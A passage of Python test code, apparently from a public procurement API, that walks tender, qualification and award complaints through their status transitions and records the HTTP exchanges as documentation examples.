self.assertEqual(response.status, '200 OK')
else:
# since RELEASE_2020_04_19 from draft to mistaken transition was available by complainant
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/tenders/{}/complaints'.format(self.tender_id),
{'data': complaint})
self.assertEqual(response.status, '201 Created')
complaint7_id = response.json['data']['id']
complaint7_token = response.json['access']['token']
with open(TARGET_DIR + 'complaints/complaint-mistaken-2020-04-19.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint7_id, complaint7_token),
{"data": {"status": "mistaken"}},
)
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
complaint_url = "/tenders/{}/complaints".format(self.tender_id)
complaint8_id, complaint8_token = complaint_create_pending(self, complaint_url, complaint_data)
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/complaint-post-reviewer-complaint-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/complaints/{}/posts'.format(
self.tender_id, complaint8_id),
{"data": {
"title": "Уточнення по вимозі",
"description": "Відсутній документ",
"recipient": "complaint_owner",
}})
self.assertEqual(response.status, '201 Created')
post1_id = response.json['data']['id']
self.app.authorization = ('Basic', ('broker', ''))
with open(TARGET_DIR + 'complaints/complaint-post-complaint-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/complaints/{}/posts?acc_token={}'.format(
self.tender_id, complaint8_id, complaint8_token),
{"data": {
"title": "Уточнення по вимозі",
"description": "Додано документ",
"recipient": "aboveThresholdReviewers",
"relatedPost": post1_id,
"documents": [{
'title': 'post_document_complaint.pdf',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/pdf'
}]
}})
self.assertEqual(response.status, '201 Created')
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/complaint-post-reviewer-tender-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/complaints/{}/posts'.format(
self.tender_id, complaint8_id),
{"data": {
"title": "Уточнення по вимозі",
"description": "Відсутній документ",
"recipient": "tender_owner",
}})
self.assertEqual(response.status, '201 Created')
post2_id = response.json['data']['id']
self.app.authorization = ('Basic', ('broker', ''))
with open(TARGET_DIR + 'complaints/complaint-post-tender-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/complaints/{}/posts?acc_token={}'.format(
self.tender_id, complaint8_id, owner_token),
{"data": {
"title": "Уточнення по вимозі",
"description": "Додано документ",
"recipient": "aboveThresholdReviewers",
"relatedPost": post2_id,
"documents": [{
'title': 'post_document_tender.pdf',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/pdf'
}]
}})
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/complaints-list.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get('/tenders/{}/complaints'.format(self.tender_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/complaint.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get('/tenders/{}/complaints/{}'.format(self.tender_id, complaint1_id))
self.assertEqual(response.status, '200 OK')
def test_qualification_complaints(self):
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/tenders?opt_pretty=1',
{'data': test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
self.set_status("active.tendering")
response = self.app.post_json(
'/tenders/{}/bids'.format(self.tender_id),
{'data': bid})
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {"status": "pending"}})
# create second bid
self.app.authorization = ('Basic', ('broker', ''))
self.create_bid(self.tender_id, bid2)
# Pre-qualification
self.set_status('active.pre-qualification', {"id": self.tender_id, 'status': 'active.tendering'})
self.check_chronograph()
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.assertEqual(response.status, "200 OK")
qualifications = response.json['data']
for qualification in qualifications:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}?acc_token={}'.format(self.tender_id, qualification['id'], owner_token),
{"data": {
"status": "active",
"qualified": True,
"eligible": True
}})
self.assertEqual(response.status, "200 OK")
self.tick()
# active.pre-qualification.stand-still
response = self.app.patch_json(
'/tenders/{}?acc_token={}'.format(self.tender_id, owner_token),
{"data": {"status": "active.pre-qualification.stand-still"}})
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.json['data']['status'], "active.pre-qualification.stand-still")
qualification_id = qualifications[0]['id']
with open(TARGET_DIR + 'complaints/qualification-complaint-submission.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(
self.tender_id, qualification_id, bid_token),
{'data': complaint})
self.assertEqual(response.status, '201 Created')
complaint1_token = response.json['access']['token']
complaint1_id = response.json['data']['id']
with open(TARGET_DIR + 'complaints/qualification-complaint-submission-upload.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/qualifications/{}/complaints/{}/documents?acc_token={}'.format(
self.tender_id, qualification_id, complaint1_id, complaint1_token),
{"data": {
"title": "Complaint_Attachment.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}})
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/qualification-complaint-complaint.http', 'w') as self.app.file_obj:
if get_now() < RELEASE_2020_04_19:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
self.tender_id, qualification_id, complaint1_id, complaint1_token),
{"data": {"status": "pending"}})
else:
with change_auth(self.app, ("Basic", ("bot", ""))):
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}'.format(
self.tender_id, qualification_id, complaint1_id),
{"data": {"status": "pending"}})
self.assertEqual(response.status, '200 OK')
complaint_data = {'data': complaint.copy()}
complaint_url = "/tenders/{}/qualifications/{}/complaints".format(self.tender_id, qualification_id)
complaint2_id, complaint2_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
complaint3_id, complaint3_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
complaint4_id, complaint4_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
complaint5_id, complaint5_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
claim_data = {'data': claim.copy()}
claim_data['data']['status'] = 'claim'
with open(TARGET_DIR + 'complaints/qualification-complaint-submission-claim.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(
self.tender_id, qualification_id, bid_token), claim_data)
self.assertEqual(response.status, '201 Created')
complaint6_token = response.json['access']['token']
complaint6_id = response.json['data']['id']
with open(TARGET_DIR + 'complaints/qualification-complaint-answer.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
self.tender_id, qualification_id, complaint6_id, owner_token),
{"data": {
"status": "answered",
"resolutionType": "resolved",
"resolution": "Умови виправлено, вибір переможня буде розгянуто повторно"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/qualification-complaint-satisfy.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
self.tender_id, qualification_id, complaint6_id, complaint6_token),
{"data": {
"satisfied": True,
}})
self.assertEqual(response.status, '200 OK')
response = self.app.post_json(
'/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(
self.tender_id, qualification_id, bid_token), claim_data)
self.assertEqual(response.status, '201 Created')
complaint7_token = response.json['access']['token']
complaint7_id = response.json['data']['id']
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
self.tender_id, qualification_id, complaint7_id, owner_token),
{'data': {
"status": "answered",
"resolutionType": "invalid",
"resolution": "Вимога не відповідає предмету закупівлі"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/qualification-complaint-unsatisfy.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
self.tender_id, qualification_id, complaint7_id, complaint7_token),
{"data": {
"satisfied": False,
}})
self.assertEqual(response.status, '200 OK')
complaint_url = "/tenders/{}/qualifications/{}/complaints".format(self.tender_id, qualification_id)
complaint8_id, complaint8_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/qualification-complaint-post-reviewer-complaint-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/qualifications/{}/complaints/{}/posts'.format(
self.tender_id, qualification_id, complaint8_id),
{"data": {
"title": "Уточнення по вимозі",
"description": "Відсутній документ",
"recipient": "complaint_owner",
}})
self.assertEqual(response.status, '201 Created')
post1_id = response.json['data']['id']
self.app.authorization = ('Basic', ('broker', ''))
with open(TARGET_DIR + 'complaints/qualification-complaint-post-complaint-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/qualifications/{}/complaints/{}/posts?acc_token={}'.format(
self.tender_id, qualification_id, complaint8_id, complaint8_token),
{"data": {
"title": "Уточнення по вимозі",
"description": "Додано документ",
"recipient": "aboveThresholdReviewers",
"relatedPost": post1_id,
"documents": [{
'title': 'post_document_complaint.pdf',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/pdf'
}]
}})
self.assertEqual(response.status, '201 Created')
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/qualification-complaint-post-reviewer-tender-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/qualifications/{}/complaints/{}/posts'.format(
self.tender_id, qualification_id, complaint8_id),
{"data": {
"title": "Уточнення по вимозі",
"description": "Відсутній документ",
"recipient": "tender_owner",
}})
self.assertEqual(response.status, '201 Created')
post2_id = response.json['data']['id']
self.app.authorization = ('Basic', ('broker', ''))
with open(TARGET_DIR + 'complaints/qualification-complaint-post-tender-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/qualifications/{}/complaints/{}/posts?acc_token={}'.format(
self.tender_id, qualification_id, complaint8_id, owner_token),
{"data": {
"title": "Уточнення по вимозі",
"description": "Додано документ",
"recipient": "aboveThresholdReviewers",
"relatedPost": post2_id,
"documents": [{
'title': 'post_document_tender.pdf',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/pdf'
}]
}})
self.assertEqual(response.status, '201 Created')
response = self.app.post_json(
'/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(
self.tender_id, qualification_id, bid_token),
{'data': claim})
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/qualification-complaint-claim.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
self.tender_id, qualification_id,
response.json['data']['id'], response.json['access']['token']),
{"data": {
"status": "claim"
}})
self.assertEqual(response.status, '200 OK')
if get_now() < RELEASE_2020_04_19:
# before RELEASE_2020_04_19 from pending to mistaken transition was available by reviewer
self.app.authorization = ('Basic', ('broker', ''))
complaint9_id, complaint9_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
with open(TARGET_DIR + 'complaints/qualification-complaint-mistaken.http', 'w') as self.app.file_obj:
self.app.authorization = ('Basic', ('reviewer', ''))
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
self.tender_id,
qualification_id,
complaint9_id,
complaint9_token
),
{"data": {"status": "mistaken"}},
)
self.assertEqual(response.status, '200 OK')
else:
# since RELEASE_2020_04_19 from draft to mistaken transition was available by complainant
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(
self.tender_id,
qualification_id,
bid_token,
),
{'data': complaint}
)
self.assertEqual(response.status, '201 Created')
complaint9_id = response.json['data']['id']
complaint9_token = response.json['access']['token']
with open(TARGET_DIR + 'complaints/qualification-complaint-mistaken-2020-04-19.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
self.tender_id,
qualification_id,
complaint9_id,
complaint9_token
),
{"data": {"status": "mistaken"}},
)
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/qualification-complaint-reject.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}'.format(
self.tender_id, qualification_id, complaint2_id),
{"data": {
"status": "invalid",
"rejectReason": "alreadyExists"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/qualification-complaint-accept.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}'.format(
self.tender_id, qualification_id, complaint1_id),
{"data": {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "Place of review"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}'.format(
self.tender_id, qualification_id, complaint3_id),
{"data": {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "Place of review"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}'.format(
self.tender_id, qualification_id, complaint4_id),
{"data": {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "Place of review"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}'.format(
self.tender_id, qualification_id, complaint5_id),
{"data": {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "Place of review"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/qualification-complaint-resolution-upload.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/qualifications/{}/complaints/{}/documents'.format(
self.tender_id, qualification_id, complaint1_id),
{"data": {
"title": "ComplaintResolution.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}})
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/qualification-complaint-resolve.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}'.format(
self.tender_id, qualification_id, complaint1_id),
{"data": {
"status": "satisfied"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/qualification-complaint-decline.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}'.format(
self.tender_id, qualification_id, complaint3_id),
{"data": {
"status": "declined"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/qualification-complaint-accepted-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}'.format(
self.tender_id, qualification_id, complaint5_id),
{"data": {
"decision": "Тендер скасовується замовником",
"status": "stopped",
"rejectReason": "tenderCancelled"
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
with open(TARGET_DIR + 'complaints/qualification-complaint-resolved.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
self.tender_id, qualification_id, complaint1_id, owner_token),
{"data": {
"tendererAction": "Умови виправлено",
"status": "resolved"
}})
self.assertEqual(response.status, '200 OK')
if RELEASE_2020_04_19 > get_now():
with open(TARGET_DIR + 'complaints/qualification-complaint-accepted-stopping.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
self.tender_id, qualification_id, complaint4_id, complaint4_token),
{"data": {
"cancellationReason": "Тендер скасовується замовником",
"status": "stopping"
}},
status=200,
)
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/qualification-complaint-stopping-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}'.format(
self.tender_id, qualification_id, complaint4_id),
{"data": {
"decision": "Тендер скасовується замовником",
"status": "stopped",
"rejectReason": "tenderCancelled"
}})
self.assertEqual(response.status, '200 OK')
else:
with open(TARGET_DIR + 'complaints/qualification-complaint-accepted-stopping-2020-04-19.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
self.tender_id, qualification_id, complaint4_id, complaint4_token),
{"data": {
"cancellationReason": "Тендер скасовується замовником",
"status": "stopping"
}},
status=403,
)
self.assertEqual(response.status, '403 Forbidden')
self.app.authorization = None
with open(TARGET_DIR + 'complaints/qualification-complaints-list.http', 'w') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/qualifications/{}/complaints'.format(
self.tender_id, qualification_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/qualification-complaint.http', 'w') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/qualifications/{}/complaints/{}'.format(
self.tender_id, qualification_id, complaint1_id))
self.assertEqual(response.status, '200 OK')
def test_award_complaints(self):
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/tenders?opt_pretty=1',
{'data': test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
self.set_status("active.tendering")
response = self.app.post_json(
'/tenders/{}/bids'.format(self.tender_id),
{'data': bid})
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {"status": "pending"}})
# create second bid
self.app.authorization = ('Basic', ('broker', ''))
self.create_bid(self.tender_id, bid2)
# response = self.app.post_json(
# '/tenders/{}/bids'.format(self.tender_id),
# {'data': bid2})
# Pre-qualification
self.set_status(
'active.pre-qualification',
{"id": self.tender_id, 'status': 'active.tendering'})
self.check_chronograph()
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.assertEqual(response.status, "200 OK")
qualifications = response.json['data']
for qualification in qualifications:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification['id'], owner_token),
{"data": {
"status": "active",
"qualified": True,
"eligible": True
}})
self.assertEqual(response.status, "200 OK")
# active.pre-qualification.stand-still
response = self.app.patch_json(
'/tenders/{}?acc_token={}'.format(self.tender_id, owner_token),
{"data": {"status": "active.pre-qualification.stand-still"}})
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.json['data']['status'], "active.pre-qualification.stand-still")
# switch to active.auction
self.set_status('active.auction')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
for b in auction_bids_data:
b.pop("status", None)
self.app.post_json(
'/tenders/{}/auction'.format(self.tender_id),
{'data': {'bids': auction_bids_data}})
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(self.tender_id, owner_token))
# get pending award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
response = self.app.patch_json(
'/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, award_id, owner_token),
{"data": {
"status": "active",
"qualified": True,
"eligible": True
}})
self.assertEqual(response.status, '200 OK')
self.tick()
with open(TARGET_DIR + 'complaints/award-complaint-submission.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints?acc_token={}'.format(
self.tender_id, award_id, bid_token),
{'data': complaint})
self.assertEqual(response.status, '201 Created')
self.tick()
complaint1_token = response.json['access']['token']
complaint1_id = response.json['data']['id']
with open(TARGET_DIR + 'complaints/award-complaint-submission-upload.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints/{}/documents?acc_token={}'.format(
self.tender_id, award_id, complaint1_id, complaint1_token),
{"data": {
"title": "Complaint_Attachment.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}})
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/award-complaint-complaint.http', 'w') as self.app.file_obj:
if get_now() < RELEASE_2020_04_19:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint1_id, complaint1_token),
{"data": {"status": "pending"}})
else:
with change_auth(self.app, ("Basic", ("bot", ""))):
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(
self.tender_id, award_id, complaint1_id),
{"data": {"status": "pending"}})
self.assertEqual(response.status, '200 OK')
complaint_data = {'data': complaint.copy()}
# with open(TARGET_DIR + 'complaints/award-complaint-submission-complaint.http', 'w') as self.app.file_obj:
# response = self.app.post_json(
# '/tenders/{}/awards/{}/complaints?acc_token={}'.format(
# self.tender_id, award_id, bid_token),
# complaint_data)
# self.assertEqual(response.status, '201 Created')
#
# complaint2_id = response.json['data']['id']
complaint_url = "/tenders/{}/awards/{}/complaints".format(self.tender_id, award_id)
complaint2_id, complaint2_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
complaint3_id, complaint3_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
complaint4_id, complaint4_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
complaint5_id, complaint5_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
claim_data = {'data': claim.copy()}
claim_data['data']['status'] = 'claim'
with open(TARGET_DIR + 'complaints/award-complaint-submission-claim.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints?acc_token={}'.format(
self.tender_id, award_id, bid_token), claim_data)
self.assertEqual(response.status, '201 Created')
complaint6_token = response.json['access']['token']
complaint6_id = response.json['data']['id']
with open(TARGET_DIR + 'complaints/award-complaint-answer.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint6_id, owner_token),
{'data': {
"status": "answered",
"resolutionType": "resolved",
"resolution": "Умови виправлено, вибір переможня буде розгянуто повторно"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaint-satisfy.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint6_id, complaint6_token),
{'data': {
"satisfied": True,
}})
self.assertEqual(response.status, '200 OK')
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints?acc_token={}'.format(
self.tender_id, award_id, bid_token), claim_data)
self.assertEqual(response.status, '201 Created')
complaint7_token = response.json['access']['token']
complaint7_id = response.json['data']['id']
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint7_id, owner_token),
{'data': {
"status": "answered",
"resolutionType": "invalid",
"resolution": "Вимога не відповідає предмету закупівлі"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaint-unsatisfy.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint7_id, complaint7_token),
{'data': {
"satisfied": False,
}})
self.assertEqual(response.status, '200 OK')
complaint_url = "/tenders/{}/awards/{}/complaints".format(self.tender_id, award_id)
complaint8_id, complaint8_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/award-complaint-post-reviewer-complaint-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints/{}/posts'.format(
self.tender_id, award_id, complaint8_id),
{"data": {
"title": "Уточнення по вимозі",
"description": "Відсутній документ",
"recipient": "complaint_owner",
}})
self.assertEqual(response.status, '201 Created')
post1_id = response.json['data']['id']
self.app.authorization = ('Basic', ('broker', ''))
with open(TARGET_DIR + 'complaints/award-complaint-post-complaint-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints/{}/posts?acc_token={}'.format(
self.tender_id, award_id, complaint8_id, complaint8_token),
{"data": {
"title": "Уточнення по вимозі",
"description": "Додано документ",
"recipient": "aboveThresholdReviewers",
"relatedPost": post1_id,
"documents": [{
'title': 'post_document_complaint.pdf',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/pdf'
}]
}})
self.assertEqual(response.status, '201 Created')
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/award-complaint-post-reviewer-tender-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints/{}/posts'.format(
self.tender_id, award_id, complaint8_id),
{"data": {
"title": "Уточнення по вимозі",
"description": "Відсутній документ",
"recipient": "tender_owner",
}})
self.assertEqual(response.status, '201 Created')
post2_id = response.json['data']['id']
self.app.authorization = ('Basic', ('broker', ''))
with open(TARGET_DIR + 'complaints/award-complaint-post-tender-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints/{}/posts?acc_token={}'.format(
self.tender_id, award_id, complaint8_id, owner_token),
{"data": {
"title": "Уточнення по вимозі",
"description": "Додано документ",
"recipient": "aboveThresholdReviewers",
"relatedPost": post2_id,
"documents": [{
'title': 'post_document_tender.pdf',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/pdf'
}]
}})
self.assertEqual(response.status, '201 Created')
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints?acc_token={}'.format(
self.tender_id, award_id, bid_token),
{'data': claim})
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/award-complaint-claim.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id,
response.json['data']['id'], response.json['access']['token']),
{'data': {
"status": "claim"
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/award-complaint-reject.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint2_id),
{'data': {
"status": "invalid",
"rejectReason": "alreadyExists"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaint-accept.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint1_id),
{'data': {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "Place of review"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint3_id),
{'data': {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "Place of review"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint4_id),
{'data': {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "Place of review"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint5_id),
{'data': {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "Place of review"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaint-resolution-upload.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints/{}/documents'.format(
self.tender_id, award_id, complaint1_id),
{"data": {
"title": "ComplaintResolution.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}})
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/award-complaint-resolve.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint1_id),
{'data': {
"status": "satisfied"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaint-decline.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint3_id),
{'data': {
"status": "declined"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaint-accepted-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint5_id),
{'data': {
"decision": "Тендер скасовується замовником",
"status": "stopped",
"rejectReason": "tenderCancelled"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaints-list.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get('/tenders/{}/awards/{}/complaints'.format(self.tender_id, award_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaint.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint1_id))
